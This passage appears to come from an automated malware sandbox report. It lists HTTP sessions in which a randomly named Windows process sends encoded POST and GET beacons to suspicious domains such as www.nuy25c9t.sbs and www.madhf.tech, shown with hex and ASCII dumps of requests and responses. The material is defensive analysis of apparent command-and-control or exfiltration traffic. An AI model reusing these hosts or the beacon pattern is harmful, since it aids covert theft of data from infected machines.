49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  35192.168.2.65002543.155.76.124803320C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 20, 2024 08:33:58.945770025 CET1847OUTPOST /lmj1/ HTTP/1.1
                                                                                  Host: www.nuy25c9t.sbs
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Connection: close
                                                                                  Content-Length: 1249
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Cache-Control: max-age=0
                                                                                  Origin: http://www.nuy25c9t.sbs
                                                                                  Referer: http://www.nuy25c9t.sbs/lmj1/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                                                  Data Raw: 47 52 35 34 79 48 5a 38 3d 45 77 46 52 66 64 34 71 34 5a 4e 50 4d 39 57 41 77 37 63 6c 41 51 4c 41 65 45 59 46 74 59 77 2f 49 51 71 4a 50 58 35 48 38 7a 36 30 59 79 6a 6f 30 48 38 70 41 71 44 35 4b 45 4c 59 65 70 64 65 6a 53 4a 4c 44 4a 39 56 54 42 74 73 50 34 63 30 73 30 7a 58 58 77 47 70 47 42 62 76 70 64 5a 6c 63 50 38 61 6d 54 73 73 52 59 78 51 65 65 41 4e 39 7a 65 4c 74 48 35 7a 61 2f 5a 6b 6c 38 67 43 79 46 43 44 30 56 7a 6c 42 57 67 5a 7a 4c 78 64 4c 73 63 73 4f 6b 62 42 64 57 43 4c 51 68 71 61 39 54 45 73 69 67 67 77 4f 55 4d 75 6e 6f 52 4c 36 62 38 39 2b 2b 6b 48 55 43 74 48 4f 39 4c 57 67 6a 54 46 4a 2b 42 65 6a 43 42 38 54 56 51 53 4e 79 43 72 56 66 76 72 6c 65 6b 69 64 76 64 74 76 4c 55 6a 32 7a 66 68 6d 4a 32 78 34 6f 69 73 38 39 62 46 67 34 69 53 46 51 48 37 36 77 34 4a 41 36 44 54 46 75 5a 42 61 50 61 37 45 69 76 48 56 72 77 36 4f 35 51 67 50 57 54 51 59 6f 72 36 58 76 4a 68 76 39 44 47 72 65 2f 37 4a 62 2b 35 6a 6b 53 42 76 32 56 6b 4e 55 63 45 72 2b 51 30 68 57 45 48 36 2b 32 32 78 [TRUNCATED]
                                                                                  Data Ascii: GR54yHZ8=EwFRfd4q4ZNPM9WAw7clAQLAeEYFtYw/IQqJPX5H8z60Yyjo0H8pAqD5KELYepdejSJLDJ9VTBtsP4c0s0zXXwGpGBbvpdZlcP8amTssRYxQeeAN9zeLtH5za/Zkl8gCyFCD0VzlBWgZzLxdLscsOkbBdWCLQhqa9TEsiggwOUMunoRL6b89++kHUCtHO9LWgjTFJ+BejCB8TVQSNyCrVfvrlekidvdtvLUj2zfhmJ2x4ois89bFg4iSFQH76w4JA6DTFuZBaPa7EivHVrw6O5QgPWTQYor6XvJhv9DGre/7Jb+5jkSBv2VkNUcEr+Q0hWEH6+22xqOBUO+I6Nvb3fEhLRMmTLSBhM/76FsUFnzt9S+u0byBJk7aRHmnf9kFxhdYo9cA6ZZ41IaolEZA2e7GWPkK34qIXmbZG8mEbd9D9HKlOpWlr/9/m7hY5J1HGMGDsMKcRe/jjZaX3/WBrzF6kk+SSJGwg1FAgQmzvPRgl2R/ala9hDZAICAaUHHQcfjn7UA06geV2/QM+HBJ7bLGZbnUs7KqwjsQH1NX4glQK7K8eixvRgteAS7YeHJltN95QlDqwx/B/TRFi+owNGgSdboSKwiLKycxHXfaus9e4lsmvGExCPJx4VsZmWnj8otcHz6nkMpI7kfL/NMMFRb2RTHkR2Lxg4ECr5rVQgJw0wFEw8JaV9EhIF143rVcw30iL/EkaWOoo0pXiKCFbyXw+65wmD2uTP9ut2JTQTcPXbJahJRuiBTL9i1UPYC8A5Q1735rsFpRQOW1p0TC9sBA/17gn77RtH4NRcvX/685EFOol8oo2rIOpUOROAFyV8qqVyQuKzg9Yt0sNHJW38+/umZoFyxVAzANcNC0cotHXb49rS5sH7eggJUF6/9buY92qjbFtb/Kp4T5uJB21xiHISHAYI6oWy9M5hLda8mVLiYPo0UUoMLx3bb1Xy4OYJ5rqnyXq2YGLv0Qd/4Cfh2/HMJn4dkFtOiPT/FkyyI [TRUNCATED]
                                                                                  Nov 20, 2024 08:33:59.818623066 CET708INHTTP/1.1 404 Not Found
                                                                                  Server: Tuser
                                                                                  Date: Wed, 20 Nov 2024 07:33:59 GMT
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Content-Length: 548
                                                                                  Connection: close
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  36192.168.2.65002643.155.76.124803320C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 20, 2024 08:34:01.485373974 CET554OUTGET /lmj1/?GR54yHZ8=JytxcoExloxtM9GYw/YkVBPtQn8SsYRrRxOyYElJ8zmzZDKm1RUtP4/aN3HHeJpfiiM3EsU/TmM7ebohnljNLiPIHS/Z5elBdrknxTUpZLsvI6YW4AGk52pDe9J+i7QDvUP60yU=&9xn=fHadNpk8MVax HTTP/1.1
                                                                                  Host: www.nuy25c9t.sbs
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                                                  Nov 20, 2024 08:34:02.362343073 CET708INHTTP/1.1 404 Not Found
                                                                                  Server: Tuser
                                                                                  Date: Wed, 20 Nov 2024 07:34:02 GMT
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Content-Length: 548
                                                                                  Connection: close
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  37192.168.2.650027103.224.182.242803320C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 20, 2024 08:34:07.718615055 CET804OUTPOST /vpqb/ HTTP/1.1
                                                                                  Host: www.madhf.tech
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Connection: close
                                                                                  Content-Length: 213
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Cache-Control: max-age=0
                                                                                  Origin: http://www.madhf.tech
                                                                                  Referer: http://www.madhf.tech/vpqb/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                                                  Data Raw: 47 52 35 34 79 48 5a 38 3d 76 66 69 2b 66 55 6e 38 33 30 77 71 46 68 6f 6f 59 71 39 32 43 41 37 47 54 39 43 33 5a 31 62 79 62 44 37 4f 71 6e 2b 30 6f 7a 6b 4e 67 42 70 47 6e 6c 4b 41 51 4d 57 6b 43 73 59 6c 58 6f 4c 43 71 70 7a 74 62 4d 61 41 52 43 35 6a 55 64 50 32 79 70 65 67 79 72 30 41 39 68 4f 65 59 4f 48 68 72 69 65 71 42 63 4a 41 50 61 73 65 4b 56 43 6b 4c 4d 59 6e 54 42 2f 4e 6e 47 5a 75 44 6a 47 30 49 2f 65 79 37 5a 39 54 48 34 4b 6f 51 74 61 6a 74 78 37 4e 61 4f 73 4b 4d 4c 6a 57 2b 2b 53 79 6d 63 2f 6b 54 63 2b 32 72 41 66 74 74 6a 59 75 72 5a 4d 6c 61 76 67 70 4b 61 2b 72 30 41 45 67 64 65 52 58 4d 55 44 4f 66 62 4e 6a
                                                                                  Data Ascii: GR54yHZ8=vfi+fUn830wqFhooYq92CA7GT9C3Z1bybD7Oqn+0ozkNgBpGnlKAQMWkCsYlXoLCqpztbMaARC5jUdP2ypegyr0A9hOeYOHhrieqBcJAPaseKVCkLMYnTB/NnGZuDjG0I/ey7Z9TH4KoQtajtx7NaOsKMLjW++Symc/kTc+2rAfttjYurZMlavgpKa+r0AEgdeRXMUDOfbNj
                                                                                  Nov 20, 2024 08:34:08.318742990 CET871INHTTP/1.1 200 OK
                                                                                  date: Wed, 20 Nov 2024 07:34:08 GMT
                                                                                  server: Apache
                                                                                  set-cookie: __tad=1732088048.1405750; expires=Sat, 18-Nov-2034 07:34:08 GMT; Max-Age=315360000
                                                                                  vary: Accept-Encoding
                                                                                  content-encoding: gzip
                                                                                  content-length: 576
                                                                                  content-type: text/html; charset=UTF-8
                                                                                  connection: close
                                                                                  Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f db 30 0c 3d c7 bf 82 70 0f 76 d0 d5 4e 11 6c 03 12 cb 3b 0c 18 b0 61 87 a1 dd ce 83 22 d3 b1 12 5b 72 25 26 69 50 e4 bf 8f 72 dc 8f 6d c0 3a 5d 6c 51 ef 91 ef d1 94 8b 86 ba b6 8c 8a 06 65 c5 0f d2 d4 62 d9 c9 aa a9 33 42 d5 14 f9 39 12 15 5e 39 dd 13 d0 b1 47 11 13 de 53 be 91 7b 79 8e c6 e0 9d 12 71 be f1 79 ad cd 1a 5d ef b4 a1 5c eb 1a b3 4e 9b 6c e3 e3 b2 c8 cf d8 d7 52 95 d1 5e 3a 70 58 69 87 8a 7e b6 da 6c 41 40 d2 10 f5 8b 3c 3f 1c 0e d9 b3 ba 7c df df ad f2 0f c9 32 8a f2 1c 6e 91 40 02 e9 0e ed 8e c0 d6 30 9f cd a0 d3 ca 59 8f ca 9a ca 03 59 c0 7b 54 3b 42 06 3e 96 00 5d 03 35 08 2f 94 43 ef 6c a7 3d c7 a4 6e 3d d4 d6 81 b7 1d 32 45 7a 6b a2 7a 67 14 69 6b f8 b8 6d 57 52 6d 6f c6 54 e9 14 1e a2 c9 41 9b ca 1e b2 d6 2a 19 50 99 c3 be 95 0a d3 df 3c 5d 26 75 2f ae de 27 d3 65 74 8a 22 72 c7 c0 64 95 9e c0 55 ee fb 68 42 80 47 1a 37 e9 9f d5 de 04 83 cc 9f 84 86 d5 fd b7 51 b3 80 4f cf 4e be dc b2 0e 59 a5 0f 9d 35 9a 2c 87 d6 8b 20 db e3 29 30 9f 58 [TRUNCATED]
                                                                                  Data Ascii: TMo0=pvNl;a"[r%&iPrm:]lQeb3B9^9GS{yqy]\NlR^:pXi~lA@<?|2n@0YY{T;B>]5/Cl=n=2EzkzgikmWRmoTA*P<]&u/'et"rdUhBG7QONY5, )0XdqLZ JL2qw-:bS-GKUM;]}9rt)kgwZ\\ieu"CXZTzW$c.8?7L<)?ZmABW/*nr+w(~|U}Sbv,_Cz


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  38192.168.2.650028103.224.182.242803320C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 20, 2024 08:34:10.327864885 CET828OUTPOST /vpqb/ HTTP/1.1
                                                                                  Host: www.madhf.tech
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Connection: close
                                                                                  Content-Length: 237
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Cache-Control: max-age=0
                                                                                  Origin: http://www.madhf.tech
                                                                                  Referer: http://www.madhf.tech/vpqb/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                                                  Data Raw: 47 52 35 34 79 48 5a 38 3d 76 66 69 2b 66 55 6e 38 33 30 77 71 46 41 59 6f 61 4a 6c 32 46 67 37 4a 50 74 43 33 58 6c 62 32 62 44 33 4f 71 6d 72 78 72 42 77 4e 68 6a 78 47 6d 6b 4b 41 65 73 57 6b 4a 4d 59 73 61 49 4c 56 71 70 76 4c 62 4d 32 41 52 44 64 6a 55 65 62 32 79 61 47 6a 7a 37 30 65 6b 78 4f 4c 46 2b 48 68 72 69 65 71 42 66 30 6c 50 61 6b 65 4b 41 53 6b 5a 2b 38 6b 4e 52 2f 4b 33 57 5a 75 48 6a 47 77 49 2f 65 41 37 59 77 32 48 2b 47 6f 51 73 71 6a 73 6b 62 4d 50 65 73 4d 50 37 69 67 37 4d 76 6e 69 65 4b 67 51 76 4f 68 32 42 58 73 73 56 46 30 33 71 4d 47 49 2f 41 72 4b 59 6d 5a 30 67 45 4b 66 65 70 58 65 44 50 70 51 76 6f 41 71 55 48 61 79 78 72 2b 46 71 56 58 43 43 76 6f 2b 54 77 69 58 51 3d 3d
                                                                                  Data Ascii: GR54yHZ8=vfi+fUn830wqFAYoaJl2Fg7JPtC3Xlb2bD3OqmrxrBwNhjxGmkKAesWkJMYsaILVqpvLbM2ARDdjUeb2yaGjz70ekxOLF+HhrieqBf0lPakeKASkZ+8kNR/K3WZuHjGwI/eA7Yw2H+GoQsqjskbMPesMP7ig7MvnieKgQvOh2BXssVF03qMGI/ArKYmZ0gEKfepXeDPpQvoAqUHayxr+FqVXCCvo+TwiXQ==
                                                                                  Nov 20, 2024 08:34:10.867294073 CET871INHTTP/1.1 200 OK
                                                                                  date: Wed, 20 Nov 2024 07:34:10 GMT
                                                                                  server: Apache
                                                                                  set-cookie: __tad=1732088050.5135837; expires=Sat, 18-Nov-2034 07:34:10 GMT; Max-Age=315360000
                                                                                  vary: Accept-Encoding
                                                                                  content-encoding: gzip
                                                                                  content-length: 576
                                                                                  content-type: text/html; charset=UTF-8
                                                                                  connection: close
                                                                                  Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f db 30 0c 3d c7 bf 82 70 0f 76 d0 d5 4e 11 6c 03 12 cb 3b 0c 18 b0 61 87 a1 dd ce 83 22 d3 b1 12 5b 72 25 26 69 50 e4 bf 8f 72 dc 8f 6d c0 3a 5d 6c 51 ef 91 ef d1 94 8b 86 ba b6 8c 8a 06 65 c5 0f d2 d4 62 d9 c9 aa a9 33 42 d5 14 f9 39 12 15 5e 39 dd 13 d0 b1 47 11 13 de 53 be 91 7b 79 8e c6 e0 9d 12 71 be f1 79 ad cd 1a 5d ef b4 a1 5c eb 1a b3 4e 9b 6c e3 e3 b2 c8 cf d8 d7 52 95 d1 5e 3a 70 58 69 87 8a 7e b6 da 6c 41 40 d2 10 f5 8b 3c 3f 1c 0e d9 b3 ba 7c df df ad f2 0f c9 32 8a f2 1c 6e 91 40 02 e9 0e ed 8e c0 d6 30 9f cd a0 d3 ca 59 8f ca 9a ca 03 59 c0 7b 54 3b 42 06 3e 96 00 5d 03 35 08 2f 94 43 ef 6c a7 3d c7 a4 6e 3d d4 d6 81 b7 1d 32 45 7a 6b a2 7a 67 14 69 6b f8 b8 6d 57 52 6d 6f c6 54 e9 14 1e a2 c9 41 9b ca 1e b2 d6 2a 19 50 99 c3 be 95 0a d3 df 3c 5d 26 75 2f ae de 27 d3 65 74 8a 22 72 c7 c0 64 95 9e c0 55 ee fb 68 42 80 47 1a 37 e9 9f d5 de 04 83 cc 9f 84 86 d5 fd b7 51 b3 80 4f cf 4e be dc b2 0e 59 a5 0f 9d 35 9a 2c 87 d6 8b 20 db e3 29 30 9f 58 [TRUNCATED]
                                                                                  Data Ascii: TMo0=pvNl;a"[r%&iPrm:]lQeb3B9^9GS{yqy]\NlR^:pXi~lA@<?|2n@0YY{T;B>]5/Cl=n=2EzkzgikmWRmoTA*P<]&u/'et"rdUhBG7QONY5, )0XdqLZ JL2qw-:bS-GKUM;]}9rt)kgwZ\\ieu"CXZTzW$c.8?7L<)?ZmABW/*nr+w(~|U}Sbv,_Cz


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  39192.168.2.650029103.224.182.242803320C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 20, 2024 08:34:12.974217892 CET1841OUTPOST /vpqb/ HTTP/1.1
                                                                                  Host: www.madhf.tech
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Connection: close
                                                                                  Content-Length: 1249
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Cache-Control: max-age=0
                                                                                  Origin: http://www.madhf.tech
                                                                                  Referer: http://www.madhf.tech/vpqb/
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3; SLCC2; Media Center PC 6.0)
                                                                                  Data Raw: 47 52 35 34 79 48 5a 38 3d 76 66 69 2b 66 55 6e 38 33 30 77 71 46 41 59 6f 61 4a 6c 32 46 67 37 4a 50 74 43 33 58 6c 62 32 62 44 33 4f 71 6d 72 78 72 42 6f 4e 68 57 74 47 6e 48 69 41 64 73 57 6b 53 73 59 68 61 49 4c 74 71 70 6e 50 62 4d 4b 36 52 41 31 6a 56 2b 48 32 36 4c 47 6a 34 37 30 65 35 68 4f 66 59 4f 47 6c 72 69 4f 75 42 63 63 6c 50 61 6b 65 4b 48 71 6b 4f 38 59 6b 4b 68 2f 4e 6e 47 59 68 44 6a 47 59 49 2f 47 51 37 59 30 4d 48 4f 6d 6f 51 4d 36 6a 76 51 37 4d 53 75 73 4f 47 72 69 6f 37 4d 69 33 69 61 71 47 51 76 4b 4c 32 44 4c 73 75 43 63 6a 71 65 4d 34 58 64 51 4e 53 71 6d 59 79 30 49 48 59 63 34 74 50 52 37 37 65 63 41 5a 70 41 7a 75 2f 44 75 48 50 35 56 39 43 6b 61 35 36 7a 39 35 4a 75 32 70 70 32 6e 6f 6d 34 76 58 6d 62 54 4a 79 50 53 6c 62 35 41 6f 4a 77 74 6d 74 54 6b 5a 66 36 45 6b 4b 57 58 38 50 6d 62 36 45 38 54 79 51 42 2b 5a 6f 51 36 64 75 4c 53 59 75 4e 7a 50 44 50 41 50 38 35 4d 4e 2f 43 69 2b 75 65 31 65 44 6f 42 4c 65 74 79 6d 71 77 54 55 66 6b 42 78 61 6e 33 75 45 76 65 65 4d [TRUNCATED]
                                                                                  Data Ascii: GR54yHZ8=vfi+fUn830wqFAYoaJl2Fg7JPtC3Xlb2bD3OqmrxrBoNhWtGnHiAdsWkSsYhaILtqpnPbMK6RA1jV+H26LGj470e5hOfYOGlriOuBcclPakeKHqkO8YkKh/NnGYhDjGYI/GQ7Y0MHOmoQM6jvQ7MSusOGrio7Mi3iaqGQvKL2DLsuCcjqeM4XdQNSqmYy0IHYc4tPR77ecAZpAzu/DuHP5V9Cka56z95Ju2pp2nom4vXmbTJyPSlb5AoJwtmtTkZf6EkKWX8Pmb6E8TyQB+ZoQ6duLSYuNzPDPAP85MN/Ci+ue1eDoBLetymqwTUfkBxan3uEveeMBlJ1jO8OtkBwzwsvhXppHLXNPZEY0gpD/3Y+go3QJCIhEqNFHxQmHyTa0wOmExmuk5tATozBpU7ASn89uRv0h2xhE8aKFIAhQHLNN5fOFz7tXQGr6ID4h45duGoZAigkjyS7pKQ/+CLncIXRAX3qbFcdV0o4Lk0v2xVHWJWRn1GZ2U+5tbC+ulVEhLosYSCP+zG+3L3uWs06yH1cYGQPmd/MaO/MV920B51mg3/Ky3x+7gBtUZqvqsDX5uxsE8QDJ5Fd9JfH1c5eBfYiB8C52BPSXnKun97cA7iIXczeLQln1tM8hlAWYZMIrdBg2Et8UV1i36Gvgbp37FqnbVRXKuNHtADNghvScgIIb7yoGyyaPkb/mqd5VaBfo/QELII1pAmtg59ept0LoCn9UXuQZiZs5Szyp5gX4Ap9Ur0AS3nmYlIbg4Tbvm2hTuL3jgXvkVpupFkaKVgpZbtatFGxYu8ACgL0kFlcQ2YLMYhh7QcFbqW8iSVRajV0VSKM2UGz2WBoBA7ICV8pDNZzyhkKbYCFqsk+n5lj8D6pdA86yVJ0VxUb/l9C4i3wRGd/b9u+lqtK/39V2GgcQFN7pc5jhJWyj1eXMywCYWx0kHfvRsE+N8K7Myk/zxnisNBNf9o5RHyK0b+1vwTpYOogFUOZ7wlLOybvMSsH9h [TRUNCATED]
                                                                                  Nov 20, 2024 08:34:13.497000933 CET871INHTTP/1.1 200 OK
                                                                                  date: Wed, 20 Nov 2024 07:34:13 GMT
                                                                                  server: Apache
                                                                                  set-cookie: __tad=1732088053.2947419; expires=Sat, 18-Nov-2034 07:34:13 GMT; Max-Age=315360000
                                                                                  vary: Accept-Encoding
                                                                                  content-encoding: gzip
                                                                                  content-length: 576
                                                                                  content-type: text/html; charset=UTF-8
                                                                                  connection: close
                                                                                  Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f db 30 0c 3d c7 bf 82 70 0f 76 d0 d5 4e 11 6c 03 12 cb 3b 0c 18 b0 61 87 a1 dd ce 83 22 d3 b1 12 5b 72 25 26 69 50 e4 bf 8f 72 dc 8f 6d c0 3a 5d 6c 51 ef 91 ef d1 94 8b 86 ba b6 8c 8a 06 65 c5 0f d2 d4 62 d9 c9 aa a9 33 42 d5 14 f9 39 12 15 5e 39 dd 13 d0 b1 47 11 13 de 53 be 91 7b 79 8e c6 e0 9d 12 71 be f1 79 ad cd 1a 5d ef b4 a1 5c eb 1a b3 4e 9b 6c e3 e3 b2 c8 cf d8 d7 52 95 d1 5e 3a 70 58 69 87 8a 7e b6 da 6c 41 40 d2 10 f5 8b 3c 3f 1c 0e d9 b3 ba 7c df df ad f2 0f c9 32 8a f2 1c 6e 91 40 02 e9 0e ed 8e c0 d6 30 9f cd a0 d3 ca 59 8f ca 9a ca 03 59 c0 7b 54 3b 42 06 3e 96 00 5d 03 35 08 2f 94 43 ef 6c a7 3d c7 a4 6e 3d d4 d6 81 b7 1d 32 45 7a 6b a2 7a 67 14 69 6b f8 b8 6d 57 52 6d 6f c6 54 e9 14 1e a2 c9 41 9b ca 1e b2 d6 2a 19 50 99 c3 be 95 0a d3 df 3c 5d 26 75 2f ae de 27 d3 65 74 8a 22 72 c7 c0 64 95 9e c0 55 ee fb 68 42 80 47 1a 37 e9 9f d5 de 04 83 cc 9f 84 86 d5 fd b7 51 b3 80 4f cf 4e be dc b2 0e 59 a5 0f 9d 35 9a 2c 87 d6 8b 20 db e3 29 30 9f 58 [TRUNCATED]
                                                                                  Data Ascii: TMo0=pvNl;a"[r%&iPrm:]lQeb3B9^9GS{yqy]\NlR^:pXi~lA@<?|2n@0YY{T;B>]5/Cl=n=2EzkzgikmWRmoTA*P<]&u/'et"rdUhBG7QONY5, )0XdqLZ JL2qw-:bS-GKUM;]}9rt)kgwZ\\ieu"CXZTzW$c.8?7L<)?ZmABW/*nr+w(~|U}Sbv,_Cz


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  40192.168.2.650030103.224.182.242803320C:\Program Files (x86)\lzWEoypSEiiPeyaPqfIfLwioPRhNNBAASkgqzKoDrdXbbpHTVceWIdlvNEZgU\nBMWUKLuWlMJko.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 20, 2024 08:34:15.515158892 CET552OUTGET /vpqb/?GR54yHZ8=idKeckLAh2QIGB9KZJIRJS/oZMGdTwW1FjmI9FLM0wQU5zssjU3Tb8uAKfYmb7Pqyu/QfIKYZQgeFcPlwIuov5hXyxvkYczVsVuddv1TKr98fV67HMUUNiXk30NJOQiWMtrF+8k=&9xn=fHadNpk8MVax HTTP/1.1
                                                                                  Host: www.madhf.tech
